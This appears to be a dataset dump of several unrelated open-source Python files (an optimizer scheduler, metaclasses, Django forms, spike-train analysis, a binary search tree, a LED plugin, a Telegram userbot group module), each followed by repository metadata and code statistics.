return scale * self._learning_rate
def state_dict(self):
return {
'training_step': self._training_step,
'decay_step': self._decay_step,
'optimizer': self._optimizer.state_dict()
}
def load_state_dict(self, state_dict, device):
self._training_step = state_dict['training_step']
# State can be partially restored
if 'decay_step' in state_dict:
self._decay_step = state_dict['decay_step']
if 'optimizer' in state_dict:
self._optimizer.load_state_dict(state_dict['optimizer'])
# https://github.com/pytorch/pytorch/issues/2830
for state in self._optimizer.state.values():
for k, v in state.items():
if torch.is_tensor(v):
state[k] = v.to(device)
def zero_grad(self):
self._optimizer.zero_grad()
def backward(self, loss):
loss.backward()
def step(self):
learning_rate = self.learning_rate()
for group in self._optimizer.param_groups:
group['lr'] = learning_rate
if self._max_grad_norm > 0:
clip_grad_norm_(group['params'], self._max_grad_norm)
self._optimizer.step()
self._decay_step += 1
self._training_step += 1
| 31.941935
| 75
| 0.613411
| 615
| 4,951
| 4.64878
| 0.214634
| 0.096537
| 0.044771
| 0.033228
| 0.284715
| 0.221056
| 0.173487
| 0.173487
| 0.149003
| 0.149003
| 0
| 0.011638
| 0.288427
| 4,951
| 155
| 76
| 31.941935
| 0.799886
| 0.07655
| 0
| 0.205128
| 0
| 0
| 0.0338
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.119658
| false
| 0
| 0.059829
| 0.017094
| 0.299145
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b59da18e5dee5065a74262a17b2223e79fa39bac
| 3,019
|
py
|
Python
|
src/argcompile/meta.py
|
artu-hnrq/argcompile
|
48b8997cc21b861fd090a809a9149d95476edbf8
|
[
"MIT"
] | null | null | null |
src/argcompile/meta.py
|
artu-hnrq/argcompile
|
48b8997cc21b861fd090a809a9149d95476edbf8
|
[
"MIT"
] | null | null | null |
src/argcompile/meta.py
|
artu-hnrq/argcompile
|
48b8997cc21b861fd090a809a9149d95476edbf8
|
[
"MIT"
] | null | null | null |
import inspect
class MetaComposition(type):
"""Overwrites a target method to behave calling same-type superclasses' implementation orderly"""
def __new__(meta, name, bases, attr, __func__='__call__'):
attr['__run__'] = attr[__func__]
attr[__func__] = meta.__run__
return super(MetaComposition, meta).__new__(
meta, name, bases, attr
)
def __run__(self, *args, **kwargs):
for compound in self.__class__.__compound__:
compound.__run__(self, *args, **kwargs)
@property
def __compound__(cls):
return [
element
for element in
list(cls.__mro__)[::-1]
if type(element)
is type(cls)
]
class MetaArgumentCompiler(MetaComposition):
"""Tracks __init__ keyword arguments to manage Actions and Attributes configuration"""
def __new__(meta, name, bases, attr):
__config__ = attr.pop('__config__', {})
__action__ = attr.pop('__action__', {})
__attr__ = attr.pop('__attr__', {})
for keys in [__action__.keys(), __attr__.keys()]:
for key in keys:
if key not in __config__.keys():
__config__[key] = {}
__init__ = attr.pop('__init__', None)
def init(self, *a, **kw):
config = {}
for key, args in __config__.items():
if key in __action__.keys() or key in __attr__.keys():
config[key] = args
config[key].update(kw.pop(key, {}))
else:
kw[key] = args
kw[key].update(kw.get(key, {}))
if __init__:
__init__(self, *a, **kw)
for key, args in config.items():
if key in __action__:
self.add_argument(
*config[key].pop('*', []),
action=__action__[key],
**config[key]
)
else:
self.add_attribute(
__attr__[key](*config[key].pop('*', []), **config[key])
)
attr['__init__'] = init
return super(MetaArgumentCompiler, meta).__new__(meta, name, bases, attr)
def __run__(self, namespace):
for compiler in self.__class__.__compound__:
namespace = compiler.__run__(self, namespace)
return namespace
class MetaAttribute(type):
"""Overwrites __call__ method to pop temporary arguments from Namespace in order to process them"""
def __new__(meta, name, bases, attr):
if __run__ := attr.get('__call__', None):
args = inspect.getargspec(__run__).args[1:]
def __call__(self, namespace):
attr = dict()
for arg in args:
if value := getattr(namespace, arg, None):
attr[arg] = value
delattr(namespace, arg)
__run__(self, namespace, **attr)
return namespace
attr['__call__'] = __call__
return super(MetaAttribute, meta).__new__(meta, name, bases, attr)
# class Meta(type):
# def __new__(meta, name, bases, attr):
# """Meta description of class definition"""
# return super(Meta, meta).__new__(meta, name, bases, attr)
# def __init__(cls, name, bases, attr, compound):
# """ Meta intervention on class instantiation """
# return super(Meta, cls).__init__(cls, name, bases, attr)
# def __call__(cls, *args):
# """ Meta modifications in object instantiation """
# return super(Meta, cls).__call__(cls, *args)
| 26.716814
| 100
| 0.663796
| 375
| 3,019
| 4.72
| 0.237333
| 0.050847
| 0.073446
| 0.072316
| 0.217514
| 0.159887
| 0.09435
| 0.079096
| 0.079096
| 0.040678
| 0
| 0.00082
| 0.191785
| 3,019
| 112
| 101
| 26.955357
| 0.72459
| 0.233852
| 0
| 0.083333
| 0
| 0
| 0.033654
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.013889
| 0.013889
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5a0cac842fff324e018f25672c1b93817ef376b
| 761
|
py
|
Python
|
linux/keyman-config/tests/test_gnome_keyboards_util.py
|
srl295/keyman
|
4dfd0f71f3f4ccf81d1badbd824900deee1bb6d1
|
[
"MIT"
] | null | null | null |
linux/keyman-config/tests/test_gnome_keyboards_util.py
|
srl295/keyman
|
4dfd0f71f3f4ccf81d1badbd824900deee1bb6d1
|
[
"MIT"
] | null | null | null |
linux/keyman-config/tests/test_gnome_keyboards_util.py
|
srl295/keyman
|
4dfd0f71f3f4ccf81d1badbd824900deee1bb6d1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
import unittest
from unittest.mock import patch
from keyman_config.gnome_keyboards_util import is_gnome_shell, _reset_gnome_shell
class GnomeKeyboardsUtilTests(unittest.TestCase):
def setUp(self):
_reset_gnome_shell()
@patch('keyman_config.os.system')
def test_IsGnomeShell_RunningGnomeShell(self, mockSystem):
# Setup
mockSystem.return_value = 0
# Execute/Verify
self.assertEqual(is_gnome_shell(), True)
@patch('keyman_config.os.system')
def test_IsGnomeShell_NotRunningGnomeShell(self, mockSystem):
# Setup
mockSystem.return_value = 1
# Execute/Verify
self.assertEqual(is_gnome_shell(), False)
if __name__ == '__main__':
unittest.main()
| 26.241379
| 81
| 0.710907
| 86
| 761
| 5.930233
| 0.476744
| 0.098039
| 0.070588
| 0.07451
| 0.486275
| 0.486275
| 0.329412
| 0.172549
| 0
| 0
| 0
| 0.004918
| 0.198423
| 761
| 28
| 82
| 27.178571
| 0.831148
| 0.07753
| 0
| 0.125
| 0
| 0
| 0.077475
| 0.065997
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.1875
| false
| 0
| 0.1875
| 0
| 0.4375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5a22c7ed55e816b9317d7d3ca45276bbf0eae8f
| 4,059
|
py
|
Python
|
ghostwriter/users/forms.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | 1
|
2022-02-04T20:24:35.000Z
|
2022-02-04T20:24:35.000Z
|
ghostwriter/users/forms.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | null | null | null |
ghostwriter/users/forms.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | null | null | null |
"""This contains all of the forms used by the Users application."""
# Django Imports
from django.contrib.admin.widgets import FilteredSelectMultiple
from django.contrib.auth import forms, get_user_model
from django.contrib.auth.forms import UserChangeForm
from django.contrib.auth.models import Group
from django.core.exceptions import ValidationError
from django.forms import ModelForm, ModelMultipleChoiceField
from django.utils.translation import gettext_lazy as _
# 3rd Party Libraries
from crispy_forms.helper import FormHelper
from crispy_forms.layout import HTML, ButtonHolder, Column, Layout, Row, Submit
User = get_user_model()
class UserChangeForm(UserChangeForm):
"""
Update details for an individual :model:`users.User`.
"""
class Meta:
model = get_user_model()
fields = (
"email",
"name",
"timezone",
"phone",
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields["phone"].widget.attrs["autocomplete"] = "off"
self.fields["phone"].widget.attrs["placeholder"] = "Your Work Number"
self.fields["phone"].help_text = "Work phone number for work contacts"
self.fields["timezone"].help_text = "Timezone in which you work"
self.helper = FormHelper()
self.helper.form_method = "post"
self.helper.form_class = "newitem"
self.helper.form_show_labels = False
self.helper.layout = Layout(
Row(
Column("name", css_class="form-group col-md-6 mb-0"),
Column("email", css_class="form-group col-md-6 mb-0"),
css_class="form-row mt-4",
),
Row(
Column("phone", css_class="form-group col-md-6 mb-0"),
Column("timezone", css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
ButtonHolder(
Submit("submit", "Submit", css_class="btn btn-primary col-md-4"),
HTML(
"""
<button onclick="window.location.href='{{ cancel_link }}'" class="btn btn-outline-secondary col-md-4" type="button">Cancel</button>
"""
),
),
)
class UserCreationForm(forms.UserCreationForm): # pragma: no cover
"""
Create an individual :model:`users.User`.
"""
error_message = forms.UserCreationForm.error_messages.update(
{"duplicate_username": _("This username has already been taken.")}
)
class Meta(forms.UserCreationForm.Meta):
model = User
def clean_username(self):
username = self.cleaned_data["username"]
try:
User.objects.get(username=username)
except User.DoesNotExist:
return username
raise ValidationError(self.error_messages["duplicate_username"])
# Create ModelForm based on the Group model
class GroupAdminForm(ModelForm):
class Meta:
model = Group
exclude = []
# Add the users field
users = ModelMultipleChoiceField(
queryset=User.objects.all(),
required=False,
# Use the pretty ``filter_horizontal`` widget
widget=FilteredSelectMultiple("users", False),
label=_(
"Users",
),
)
def __init__(self, *args, **kwargs):
# Do the normal form initialisation
super().__init__(*args, **kwargs)
# If it is an existing group (saved objects have a pk)
if self.instance.pk:
# Populate the users field with the current Group users
self.fields["users"].initial = self.instance.user_set.all()
def save_m2m(self): # pragma: no cover
# Add the users to the Group
self.instance.user_set.set(self.cleaned_data["users"])
def save(self, *args, **kwargs): # pragma: no cover
# Default save
instance = super().save()
# Save many-to-many data
self.save_m2m()
return instance
| 33
| 151
| 0.60951
| 459
| 4,059
| 5.270153
| 0.357298
| 0.028938
| 0.029764
| 0.028111
| 0.120711
| 0.060356
| 0.060356
| 0.060356
| 0.060356
| 0.060356
| 0
| 0.004773
| 0.277408
| 4,059
| 122
| 152
| 33.270492
| 0.81998
| 0.136487
| 0
| 0.160494
| 0
| 0
| 0.132743
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061728
| false
| 0
| 0.111111
| 0
| 0.296296
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5a405be96095986ee0bca6128c66be907263013
| 5,119
|
py
|
Python
|
nxsdk_modules_contrib/pelenet/pelenet/utils/spikes.py
|
biagiom/models
|
79489a3c429b3027dd420840bbccfee5e8c9a879
|
[
"BSD-3-Clause"
] | 54
|
2020-03-04T17:37:17.000Z
|
2022-02-22T13:16:10.000Z
|
nxsdk_modules_contrib/pelenet/pelenet/utils/spikes.py
|
biagiom/models
|
79489a3c429b3027dd420840bbccfee5e8c9a879
|
[
"BSD-3-Clause"
] | 9
|
2020-08-26T13:17:54.000Z
|
2021-11-09T09:02:00.000Z
|
nxsdk_modules_contrib/pelenet/pelenet/utils/spikes.py
|
biagiom/models
|
79489a3c429b3027dd420840bbccfee5e8c9a879
|
[
"BSD-3-Clause"
] | 26
|
2020-03-18T17:09:34.000Z
|
2021-11-22T16:23:14.000Z
|
import numpy as np
import scipy.linalg as la
from statsmodels.tsa.api import SimpleExpSmoothing, Holt
"""
@desc: From activity probe, calculate spike patterns
"""
def getSpikesFromActivity(self, activityProbes):
# Get number of probes (equals number of used cores)
numProbes = np.shape(activityProbes)[0]
# Concatenate all probes
activityTrain = []
for i in range(numProbes):
activityTrain.extend(activityProbes[i].data)
# Transform to numpy array
activityTrain = np.array(activityTrain)
# Calculate spike train from activity
#spikeTrain = activityTrain[:,1:] - activityTrain[:,:-1]
activityTrain[:,1:] -= activityTrain[:,:-1]
spikeTrain = activityTrain
return spikeTrain
"""
@desc: Calculate cross correlation between spike trains of two neurons
"""
def cor(self, t1, t2):
# Calculate standard devaition of each spike train
sd1 = np.sqrt(np.correlate(t1, t1)[0])
sd2 = np.sqrt(np.correlate(t2, t2)[0])
# Check if any standard deviation is zero
if (sd1 != 0 and sd2 != 0):
return np.correlate(t1, t2)[0]/np.multiply(sd1, sd2)
else:
return 0
"""
@desc: Filter spike train
@pars: spikeTrain: has N rows (number of neurons) and T columns (number of time steps)
filter: filter method as string, can be: 'single exponential', 'double exponential' or 'gaussian' (symmetric)
"""
def getFilteredSpikes(self, spikes, filter="single exponential"):
if (filter == 'single exponential'):
return self.getSingleExponentialFilteredSpikes(spikes)
if (filter == 'double exponential'):
return self.getHoltDoubleExponentialFilteredSpikes(spikes)
if (filter == 'gaussian'):
return self.getGaussianFilteredSpikes(spikes)
"""
@desc: Get symmetric gaussian filtered spikes
"""
def getGaussianFilteredSpikes(self, spikes):
# Define some variables
wd = self.p.smoothingWd # width of smoothing, number of influenced neurons to the left and right
var = self.p.smoothingVar # variance of the Gaussian kernel
# Define the kernel
lin = np.linspace(-wd,wd,(wd*2)+1)
kernel = np.exp(-(1/(2*var))*lin**2)
# Prepare spike window
spikeWindow = np.concatenate((spikes[-wd:,:], spikes, spikes[:wd,:]))
# Prepare smoothed array
nSteps, nNeurons = spikeWindow.shape
smoothed = np.zeros((nSteps, nNeurons))
# Add smoothing to every spike
for n in range(nNeurons):
for t in range(wd, nSteps - wd):
# Only add something if there is a spike, otherwise just add zeros
add = kernel if spikeWindow[t,n] == 1 else np.zeros(2*wd+1)
# Add values to smoothed array
smoothed[t-wd:t+wd+1, n] += add
# Return smoothed activity
return smoothed[wd:-wd,:]
"""
@desc: Get single exponential filtered spikes
"""
def getSingleExponentialFilteredSpikes(self, spikes, smoothing_level=0.1):
# Get dimensions
N, T = np.shape(spikes)
filteredSpikes = []
# Iterate over all neurons
for i in range(N):
# Fit values
fit = SimpleExpSmoothing(spikes[i,:]).fit(smoothing_level=smoothing_level)
# Append filtered values for current neuron
filteredSpikes.append(fit.fittedvalues)
# Transform to numpy array and return
return np.array(filteredSpikes)
"""
@desc: Get holt double exponential filtered spikes
"""
def getHoltDoubleExponentialFilteredSpikes(self, spikes, smoothing_level=0.1, smoothing_slope=0.1):
# Get dimensions
N, T = np.shape(spikes)
filteredSpikes = []
# Iterate over all neurons
for i in range(N):
# Fit values, if smoothing_slope = 0, result equals single exponential solution
fit = Holt(spikes[i,:]).fit(smoothing_level=smoothing_level, smoothing_slope=smoothing_slope)
# Append filtered values for current neuron
filteredSpikes.append(fit.fittedvalues)
# Transform to numpy array and return
return np.array(filteredSpikes)
"""
@desc: Calculate fano factors
"""
def fano(self, spikes):
# Get shape
shp = spikes.shape
# Iterate over all trials
ff = []
for i in range(shp[0]):
# Get mean and standard deviation of all spike trains
mn = np.mean(spikes[i], axis=1)
var = np.var(spikes[i], axis=1)
# Get indices of zero-values
mask = (mn != 0)
# Append mean fano factors from all neurons with spiking activity
ff.append(np.mean(var[mask]/mn[mask]))
# Return mean fano factors for every trial
return ff
"""
@desc: Calculate coefficient of variation
"""
def cv(self, spikes):
# Get shape
shp = spikes.shape
# Iterate over all trials
cv = []
for i in range(shp[0]):
# Get mean and standard deviation of all spike trains
mn = np.mean(spikes[i], axis=1)
sd = np.std(spikes[i], axis=1)
# Get indices of zero-values
mask = (mn != 0)
# Append mean fano factors from all neurons with spiking activity
cv.append(np.mean(sd[mask]/mn[mask]))
# Return mean fano factors for every trial
return cv
| 31.99375
| 116
| 0.66302
| 657
| 5,119
| 5.150685
| 0.252664
| 0.01448
| 0.008865
| 0.016253
| 0.345154
| 0.345154
| 0.31383
| 0.291371
| 0.291371
| 0.291371
| 0
| 0.012462
| 0.231881
| 5,119
| 159
| 117
| 32.194969
| 0.848169
| 0.268412
| 0
| 0.253521
| 0
| 0
| 0.02013
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.112676
| false
| 0
| 0.042254
| 0
| 0.309859
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5a74044f5f2241591f7f602964eb017fc2ac290
| 6,429
|
py
|
Python
|
src/bst.py
|
tranduythanh/algorithm-in-python
|
b883ea0bc4dcd46b9a9f72f0ca3786aa3545f58a
|
[
"MIT"
] | null | null | null |
src/bst.py
|
tranduythanh/algorithm-in-python
|
b883ea0bc4dcd46b9a9f72f0ca3786aa3545f58a
|
[
"MIT"
] | null | null | null |
src/bst.py
|
tranduythanh/algorithm-in-python
|
b883ea0bc4dcd46b9a9f72f0ca3786aa3545f58a
|
[
"MIT"
] | null | null | null |
from visualize import pprint
class Node:
def __init__(self, key):
self.left = None
self.right = None
self.val = key
def __repr__(self):
ptr = id(self)
ret = f'{ptr}:'
if self.left:
ret = f'{ret} {self.left.val}'
else:
ret = f'{ret} None'
ret = f'{ret} {self.val}'
if self.right:
ret = f'{ret} {self.right.val}'
else:
ret = f'{ret} None'
return ret
def has_no_child(self):
return (self.left is None) and (self.right is None)
def has_only_left(self):
return (self.left is not None) and (self.right is None)
def has_only_right(self):
return (self.left is None) and (self.right is not None)
class Tree:
def __init__(self, root = None):
self.root = root
def insert_recursive(self, x):
if self.root is None:
self.root = Node(x)
return
self.__insert_recursive(self.root, x)
def __insert_recursive(self, node, x):
if node.val == x:
return
if node.val < x:
if node.right is None:
node.right = Node(x)
return
self.__insert_recursive(node.right, x)
return
# insert to left
if node.left is None:
node.left = Node(x)
self.__insert_recursive(node.left, x)
def insert_loop(self, x):
if self.root is None:
self.root = Node(x)
return
node = self.root
while True:
if node.val > x:
if node.left:
node = node.left
continue
node.left = Node(x)
return
if node.right:
node = node.right
continue
node.right = Node(x)
return
def exist_recursive(self, x):
return self.__exist_recursive(self.root, x)
def __exist_recursive(self, node, x):
if node.val == x:
return True
if node.val < x:
if node.right:
return self.__exist_recursive(node.right, x)
return False
if node.left:
return self.__exist_recursive(node.left, x)
return False
def exist_loop(self, x):
node = self.root
while True:
if not node:
return False
if node.val == x:
return True
if node.val < x:
node = node.right
continue
node = node.left
def sort_lnr_recursive(self):
return self.__lnr_recursive(self.root)
def __lnr_recursive(self, node, arr=[]):
if node.left:
self.__lnr_recursive(node.left, arr)
arr.append(node.val)
if node.right:
self.__lnr_recursive(node.right, arr)
return arr
def sort_lnr_loop(self):
ret = []
node = self.root
stack = []
while True:
while node:
stack.append(node)
node = node.left
if len(stack) > 0:
node = stack.pop()
ret.append(node.val)
node = node.right
continue
break
return ret
def sort_nlr_recursive(self):
return self.__nlr_recursive(self.root)
def __nlr_recursive(self, node, arr=[]):
arr.append(node.val)
if node.left:
self.__nlr_recursive(node.left, arr)
if node.right:
self.__nlr_recursive(node.right, arr)
return arr
def sort_lrn_recursive(self):
return self.__lrn_recursive(self.root)
def __lrn_recursive(self, node, arr=[]):
if node.left:
self.__lrn_recursive(node.left, arr)
if node.right:
self.__lrn_recursive(node.right, arr)
arr.append(node.val)
return arr
def get_min(self):
node = self.root
while node.left is not None:
node = node.left
return node.val
def get_min_of_node(self, node):
while node.left is not None:
node = node.left
return node.val
def get_max(self):
node = self.root
while node.right is not None:
node = node.right
return node.val
def delete(self, x):
self.root = self.__delete(self.root, x)
def __delete(self, node, x):
if node is None:
return None
if node.val < x:
node.right = self.__delete(node.right, x)
return node
if node.val > x:
node.left = self.__delete(node.left, x)
return node
if node.val == x:
if node.has_no_child():
return None
# Handle case: node has a single child
if node.has_only_left():
return node.left
if node.has_only_right():
return node.right
# handle case: node has 2 children
# ____C___
# / \
# B E <---- delete this node
# / \
# D K
# / \
# I L
# \
# J
# step 1: replace E by I
# step 2: delete I
min_value = self.get_min_of_node(node.right)
node.val = min_value
node.right = self.__delete(node.right, min_value)
return node
return node
def traverse(self):
return self.__traverse(self.root, [])
def __traverse(self, node, arr=[]):
arr.append(node)
if node.left:
self.__traverse(node.left, arr)
if node.right:
self.__traverse(node.right, arr)
return arr
def cal_height(self):
return self.__cal_height(self.root)
def __cal_height(self, node):
if node is None:
return 0
a = self.__cal_height(node.left)
b = self.__cal_height(node.right)
if a > b:
return (a+1)
return (b+1)
def build_tree(self, arr=[]):
for item in arr:
self.insert_recursive(item)
def debug(self):
pprint(self.root)
| 27.474359
| 63
| 0.492767
| 770
| 6,429
| 3.923377
| 0.11039
| 0.057597
| 0.029791
| 0.033102
| 0.461106
| 0.359484
| 0.265475
| 0.209202
| 0.139027
| 0.106587
| 0
| 0.00187
| 0.417639
| 6,429
| 233
| 64
| 27.592275
| 0.805021
| 0.053196
| 0
| 0.473404
| 0
| 0
| 0.013999
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159574
| false
| 0
| 0.005319
| 0.047872
| 0.404255
| 0.010638
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5af94b7bf661eb528749316c8d0360da97313c8
| 1,023
|
py
|
Python
|
pythonModules/plugin_showRainbowAllLEDs.py
|
mhoelzner/BinaryClock_RP
|
3dcd6c9369b827c4228c90c8c4da6dd9c21ab632
|
[
"MIT"
] | null | null | null |
pythonModules/plugin_showRainbowAllLEDs.py
|
mhoelzner/BinaryClock_RP
|
3dcd6c9369b827c4228c90c8c4da6dd9c21ab632
|
[
"MIT"
] | null | null | null |
pythonModules/plugin_showRainbowAllLEDs.py
|
mhoelzner/BinaryClock_RP
|
3dcd6c9369b827c4228c90c8c4da6dd9c21ab632
|
[
"MIT"
] | null | null | null |
from neopixel import Color
import time
class ShowRainbowAllLEDs():
def __init__(self, strip, config):
self.strip = strip
self.configuration = config
def wheel(self, pos):
"""Generate rainbow colors across 0-255 positions."""
if pos < 85:
return Color(pos * 3, 255 - pos * 3, 0)
elif pos < 170:
pos -= 85
return Color(255 - pos * 3, 0, pos * 3)
else:
pos -= 170
return Color(0, pos * 3, 255 - pos * 3)
def showRainbowAllLEDs(self):
"""Draw rainbow that fades across all pixels at once."""
while True:
if self.configuration.plugin == 1:
return
for j in range(256):
if self.configuration.plugin == 1:
return
for i in range(self.strip.numPixels()):
self.strip.setPixelColor(i, self.wheel((i+j) & 255))
self.strip.show()
time.sleep(0.02)
| 26.230769
| 72
| 0.507331
| 119
| 1,023
| 4.327731
| 0.428571
| 0.046602
| 0.040777
| 0.062136
| 0.178641
| 0.135922
| 0.135922
| 0
| 0
| 0
| 0
| 0.06891
| 0.390029
| 1,023
| 38
| 73
| 26.921053
| 0.75641
| 0.095797
| 0
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115385
| false
| 0
| 0.076923
| 0
| 0.423077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b23767bc452d1d161330f945974af76c7faa29
| 3,337
|
py
|
Python
|
tronx/modules/group.py
|
TronUb/Tron
|
55b5067a34cf2849913647533d7d035cab64568e
|
[
"MIT"
] | 4
|
2022-03-07T07:27:04.000Z
|
2022-03-29T05:59:57.000Z
|
tronx/modules/group.py
|
TronUb/Tron
|
55b5067a34cf2849913647533d7d035cab64568e
|
[
"MIT"
] | null | null | null |
tronx/modules/group.py
|
TronUb/Tron
|
55b5067a34cf2849913647533d7d035cab64568e
|
[
"MIT"
] | 3
|
2022-03-05T15:24:51.000Z
|
2022-03-14T08:48:05.000Z
|
import asyncio
from pyrogram.raw import functions
from pyrogram.types import Message
from tronx import app, gen
app.CMD_HELP.update(
{"group" : (
"group",
{
"bgroup [group name]" : "Creates a basic group.",
"sgroup [group name]" : "Creates a super group.",
"unread" : "Mark a chat as unread in your telegram folders.",
"channel [channel name]" : "Create a channel through this command."
}
)
}
)
@app.on_message(gen(["bgroup", "bgp"], allow =["sudo"]))
async def basicgroup_handler(_, m: Message):
grpname = None
users = None
if app.long() == 1:
return await app.send_edit(f"Usage: `{app.PREFIX}bgroup mygroupname`", delme=4)
elif app.long() > 1:
grpname = m.text.split(None, 1)[1]
users = "@TheRealPhoenixBot"
elif app.long() > 2:
grpname = m.text.split(None, 1)[1]
users = m.text.split(None, 2)[2].split()
else:
grpname = False
users = "@TheRealPhoenixBot" # required
try:
if grpname:
await app.send_edit(f"Creating a new basic group: `{grpname}`")
group = await app.create_group(title=f"{grpname}", users=users)
await app.send_edit(f"**Created a new basic group:** [{grpname}]({(await app.get_chat(group.id)).invite_link})")
else:
await app.send_edit("No group name is provided.", text_type=["mono"], delme=4)
except Exception as e:
await app.error(e)
@app.on_message(gen(["sgroup", "sgp"], allow =["sudo"]))
async def supergroup_handler(_, m: Message):
grpname = None
about = None
if app.long() == 1:
return await app.send_edit(f"`Usage: {app.PREFIX}sgroup mygroupname`", delme=4)
elif app.long() > 1:
grpname = m.text.split(None, 1)[1]
about = ""
elif app.long() > 2:
grpname = m.text.split(None, 1)[1]
about = m.text.split(None, 2)[2]
else:
grpname = False
about = ""
try:
if grpname:
await app.send_edit(f"Creating a new super group: `{grpname}`")
group = await app.create_supergroup(title=f"{grpname}", description=about)
await app.send_edit(f"**Created a new super group:** [{grpname}]({(await app.get_chat(group.id)).invite_link})")
else:
await app.send_edit("No group name is provided.", text_type=["mono"], delme=4)
except Exception as e:
await app.error(e)
@app.on_message(gen(["unread", "un"], allow =["sudo"]))
async def unreadchat_handler(_, m: Message):
try:
await asyncio.gather(
m.delete(),
app.invoke(
functions.messages.MarkDialogUnread(
peer=await app.resolve_peer(m.chat.id),
unread=True
)
),
)
except Exception as e:
await app.error(e)
@app.on_message(gen("channel", allow =["sudo"]))
async def channel_handler(_, m: Message):
chname = None
about = None
if app.long() == 1:
return await app.send_edit(f"Usage: `{app.PREFIX}channel [channel name]`", delme=4)
elif app.long() > 1:
chname = m.text.split(None, 1)[1]
about = ""
elif app.long() > 2:
chname = m.text.split(None, 1)[1]
about = m.text.split(None, 2)[2]
try:
if chname:
await app.send_edit(f"Creating your channel: `{chname}`")
response = await app.create_channel(title=f"{chname}", description=about)
if response:
await app.send_edit(f"**Created a new channel:** [{chname}]({(await app.get_chat(response.id)).invite_link})", disable_web_page_preview=True)
else:
await app.send_edit("Couldn't create a channel.")
except Exception as e:
await app.error(e)
| 26.275591
| 145
| 0.66407
| 503
| 3,337
| 4.326044
| 0.214712
| 0.084559
| 0.066176
| 0.088235
| 0.559283
| 0.518842
| 0.463235
| 0.463235
| 0.399816
| 0.399816
| 0
| 0.011527
| 0.168115
| 3,337
| 126
| 146
| 26.484127
| 0.772334
| 0.002397
| 0
| 0.49
| 0
| 0.02
| 0.269312
| 0.034265
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04
| 0
| 0.07
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b4a7c2bcf95fde6a181a23d3adc5de69780240
| 5,152
|
py
|
Python
|
benchmark/bit_task/input_pipeline.py
|
Fanxingye/AutoDL
|
6f409aefc8b81e5fe47df57b82332c8df427875d
|
[
"Apache-2.0"
] | 1
|
2021-11-04T09:19:14.000Z
|
2021-11-04T09:19:14.000Z
|
benchmark/bit_task/input_pipeline.py
|
Fanxingye/AutoDL
|
6f409aefc8b81e5fe47df57b82332c8df427875d
|
[
"Apache-2.0"
] | null | null | null |
benchmark/bit_task/input_pipeline.py
|
Fanxingye/AutoDL
|
6f409aefc8b81e5fe47df57b82332c8df427875d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
